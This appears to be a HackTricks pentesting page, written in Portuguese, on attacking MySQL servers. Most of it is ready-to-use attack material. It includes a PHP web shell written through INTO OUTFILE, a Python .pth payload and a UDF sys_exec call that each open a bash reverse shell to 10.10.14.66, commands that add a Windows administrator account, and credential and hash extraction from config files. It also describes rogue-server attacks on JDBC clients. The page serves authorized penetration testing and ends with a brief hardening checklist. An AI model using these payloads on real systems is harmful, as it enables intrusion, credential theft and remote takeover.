3306 - Pentesting Mysql

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

Informações Básicas

MySQL pode ser descrito como um Sistema de Gerenciamento de Banco de Dados Relacional (RDBMS) de código aberto que está disponível gratuitamente. Ele opera com a Linguagem de Consulta Estruturada (SQL), permitindo o gerenciamento e a manipulação de bancos de dados.

Porta padrão: 3306

3306/tcp open  mysql

Conectar

Local

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Remoto

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Enumeração Externa

Algumas das ações de enumeração exigem credenciais válidas

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Escrever qualquer dado binário

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL comandos

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Enumeração de Permissões do MySQL

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Você pode ver na documentação o significado de cada privilégio: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

MySQL File priv to SSRF/RCE

INTO OUTFILE → Python .pth RCE (ganchos de configuração específicos do site)

Abusando do clássico INTO OUTFILE primitive é possível obter arbitrary code execution em alvos que executem posteriormente scripts em Python.

1. Use INTO OUTFILE para colocar um arquivo .pth personalizado dentro de qualquer diretório carregado automaticamente por site.py (por exemplo .../lib/python3.10/site-packages/).
2. O arquivo .pth pode conter uma única linha começando com import seguida por código Python arbitrário que será executado toda vez que o interpretador iniciar.
3. Quando o interpretador é executado implicitamente por um script CGI (por exemplo /cgi-bin/ml-draw.py com shebang #!/bin/python), o payload é executado com os mesmos privilégios do processo do servidor web (FortiWeb o executou como root → full pre-auth RCE).

Exemplo de payload .pth (linha única, nenhum espaço pode ser incluído no payload SQL final, então hex/UNHEX() ou concatenação de strings pode ser necessária):

import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

Exemplo de criação do arquivo através de uma query UNION (caracteres de espaço substituídos por /**/ para contornar um filtro de espaços sscanf("%128s") e manter o comprimento total ≤128 bytes):

'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

Limitações importantes & bypasses:

• INTO OUTFILE não pode sobrescrever arquivos existentes; escolha um novo nome de arquivo.
• O caminho do arquivo é resolvido relativo ao CWD do MySQL, então prefixar com ../../ ajuda a encurtar o caminho e contornar restrições de caminho absoluto.
• Se a entrada do atacante for extraída com %128s (ou similar) qualquer espaço irá truncar o payload; use as sequências de comentário do MySQL /**/ ou /*!*/ para substituir espaços.
• O usuário MySQL que executa a query precisa do privilégio FILE, mas em muitos appliances (por exemplo FortiWeb) o serviço roda como root, dando acesso de escrita em quase todos os lugares.

Após gravar o .pth, basta solicitar qualquer CGI tratado pelo interpretador python para obter execução de código:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

O processo Python importará automaticamente o .pth malicioso e executará o shell payload.

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL arbitrary read file by client

Na verdade, quando você tenta load data local into a table o conteúdo de um arquivo o servidor MySQL ou MariaDB pede ao client para lê-lo e enviar o conteúdo. Então, se você conseguir manipular um mysql client para conectar ao seu próprio MySQL server, você pode ler arquivos arbitrários.
Por favor, observe que este é o comportamento usando:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Observe a palavra “local”)
Porque sem o “local” você pode obter:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Inicial PoC: https://github.com/allyshka/Rogue-MySql-Server
Neste artigo você pode ver uma descrição completa do ataque e até como estendê-lo para RCE: https://paper.seebug.org/1113/
Aqui você pode encontrar uma visão geral do ataque: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​

POST

Mysql User

Será muito interessante se mysql estiver rodando como root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Configurações Perigosas de mysqld.cnf

Na configuração dos serviços MySQL, várias opções são empregadas para definir seu funcionamento e medidas de segurança:

• A configuração user é utilizada para designar o usuário sob o qual o serviço MySQL será executado.
• password é usado para definir a senha associada ao usuário MySQL.
• admin_address especifica o endereço IP que escuta por conexões TCP/IP na interface de rede administrativa.
• A variável debug indica as configurações de depuração atuais, incluindo informações sensíveis nos logs.
• sql_warnings controla se strings de informação são geradas para instruções INSERT de uma única linha quando surgem avisos, contendo dados sensíveis nos logs.
• Com secure_file_priv, o escopo das operações de importação e exportação de dados é restrito para aumentar a segurança.

Enumeração local no Linux

Se você já tem acesso ao shell no host, as vitórias mais rápidas geralmente são local sockets, client credential files, e auth plugins que mapeiam um usuário do SO para uma conta DB.

Caminhos e artefatos de alto sinal:

ls -l /run/mysqld/mysqld.sock /var/run/mysqld/mysqld.sock 2>/dev/null
ls -l /etc/mysql/debian.cnf ~/.my.cnf ~/.mylogin.cnf 2>/dev/null
grep -RNI -E '^(bind-address|skip-networking|socket)\\b' /etc/mysql /etc/my.cnf* 2>/dev/null

Se o socket local estiver acessível, inspecione users/plugins e a identidade efetiva:

mysql -S /run/mysqld/mysqld.sock -u root -e \
"SELECT user,host,plugin,account_locked FROM mysql.user;" 2>/dev/null
mysql -S /run/mysqld/mysqld.sock -u root -e \
"SELECT USER(),CURRENT_USER();" 2>/dev/null

O que procurar:

• auth_socket / unix_socket em usuários privilegiados: um usuário do SO pode se tornar um usuário DB pelo socket local sem senha de DB
• arquivos legíveis /etc/mysql/debian.cnf ou ~/.my.cnf
• secure_file_priv vazio ou apontando para um diretório gravável
• local_infile habilitado quando não é necessário

Verificações rápidas de postura:

mysql -S /run/mysqld/mysqld.sock -u root -e "
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'local_infile';
SHOW GRANTS FOR CURRENT_USER();
" 2>/dev/null

Escalada de privilégios

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Privilege Escalation via library

Se o mysql server is running as root (ou um usuário com privilégios mais altos) você pode fazê-lo executar comandos. Para isso, é preciso usar user defined functions. E para criar uma user defined você vai precisar de uma library para o OS que está rodando o mysql.

A biblioteca maliciosa a ser usada pode ser encontrada dentro do sqlmap e do metasploit executando locate "*lib_mysqludf_sys*". Os arquivos .so são bibliotecas linux e os .dll são as do Windows, escolha a que você precisa.

Se você não tiver essas bibliotecas, pode procurar por elas, ou baixar este linux C code e compilá-lo dentro da máquina linux vulnerável:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Agora que você tem a biblioteca, faça login no Mysql como um usuário privilegiado (root?) e siga os próximos passos:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Dica do Windows: criar diretórios com NTFS ADS a partir de SQL

Em NTFS você pode forçar a criação de diretórios usando um alternate data stream mesmo quando existe apenas uma primitiva de escrita de arquivo. Se a cadeia UDF clássica espera um diretório plugin mas ele não existe e @@plugin_dir é desconhecido ou bloqueado, você pode criá-lo primeiro com ::$INDEX_ALLOCATION:

SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory

Isto transforma o limitado SELECT ... INTO OUTFILE numa primitiva mais completa em stacks Windows, bootstrapping a estrutura de pastas necessária para UDF drops.

Extraindo credenciais do MySQL de arquivos

Dentro de /etc/mysql/debian.cnf você pode encontrar a senha em texto simples do usuário debian-sys-maint

cat /etc/mysql/debian.cnf

Você pode usar essas credenciais para fazer login no banco de dados mysql.

Dentro do arquivo: /var/lib/mysql/mysql/user.MYD você pode encontrar todos os hashes dos usuários MySQL (aqueles que você pode extrair de mysql.user dentro do banco de dados).

Você pode extraí-los fazendo:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Ativando logging

Você pode ativar o logging das queries do mysql em /etc/mysql/my.cnf descomentando as linhas a seguir:

Arquivos úteis

Arquivos de configuração

• windows *
• config.ini
• my.ini
• windows\my.ini
• winnt\my.ini
• <InstDir>/mysql/data/
• unix
• my.cnf
• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf
• /etc/my.cnf
• Histórico de comandos
• ~/.mysql.history
• Arquivos de log
• connections.log
• update.log
• common.log

Banco de Dados/Tabelas padrão do MySQL

Comandos automáticos do HackTricks

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

​

2023-2025 Destaques (novo)

JDBC propertiesTransform deserialization (CVE-2023-21971)

A partir do Connector/J <= 8.0.32, um atacante que puder influenciar a JDBC URL (por exemplo, em software de terceiros que solicite uma string de conexão) pode solicitar que classes arbitrárias sejam carregadas no lado do cliente via o parâmetro propertiesTransform. Se um gadget presente no class-path puder ser carregado, isso resulta em remote code execution in the context of the JDBC client (pre-auth, porque não são necessárias credenciais válidas). Um PoC mínimo fica assim:

jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Executar Evil.class pode ser tão simples quanto colocá-lo no class-path da aplicação vulnerável ou permitir que um servidor MySQL rogue envie um objeto serializado malicioso. O problema foi corrigido no Connector/J 8.0.33 – atualize o driver ou defina explicitamente propertiesTransform em uma allow-list. (Veja o Snyk write-up para detalhes)

Rogue / Fake MySQL server attacks against JDBC clients

Várias ferramentas de código aberto implementam um protocolo MySQL parcial para atacar clientes JDBC que se conectam externamente:

• mysql-fake-server (Java, suporta leitura de arquivos e exploits de deserialization)
• rogue_mysql_server (Python, capacidades semelhantes)

Caminhos de ataque típicos:

1. A aplicação vítima carrega mysql-connector-j com allowLoadLocalInfile=true ou autoDeserialize=true.
2. O atacante controla o DNS / entrada de host de modo que o hostname do DB resolva para uma máquina sob seu controle.
3. O servidor malicioso responde com pacotes forjados que disparam tanto leitura arbitrária de arquivos via LOCAL INFILE quanto Java deserialization → RCE.

Exemplo de one-liner para iniciar um servidor fake (Java):

java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

Aponte então a aplicação vítima para jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true e leia /etc/passwd codificando o nome do arquivo em base64 no campo username (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

Quebrando hashes caching_sha2_password

O MySQL ≥ 8.0 armazena hashes de senha como $mysql-sha2$ (SHA-256). Tanto o Hashcat (mode 21100) quanto o John-the-Ripper (--format=mysql-sha2) suportam offline cracking desde 2023. Faça dump da coluna authentication_string e alimente-a diretamente:

# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

Hardening checklist (2025)

• Defina LOCAL_INFILE=0 e --secure-file-priv=/var/empty para eliminar a maioria das primitivas de leitura/gravação de arquivos. • Remova o privilégio FILE das contas de aplicação. • No Connector/J, defina allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (vazio). • Desative plugins de autenticação não utilizados e exija TLS (require_secure_transport = ON). • Monitore CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL e execuções súbitas de SET GLOBAL.

Referências

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

• Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)

• mysql-fake-server – Rogue MySQL server for JDBC client attacks

• The Art of PHP: CTF‑born exploits and techniques

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.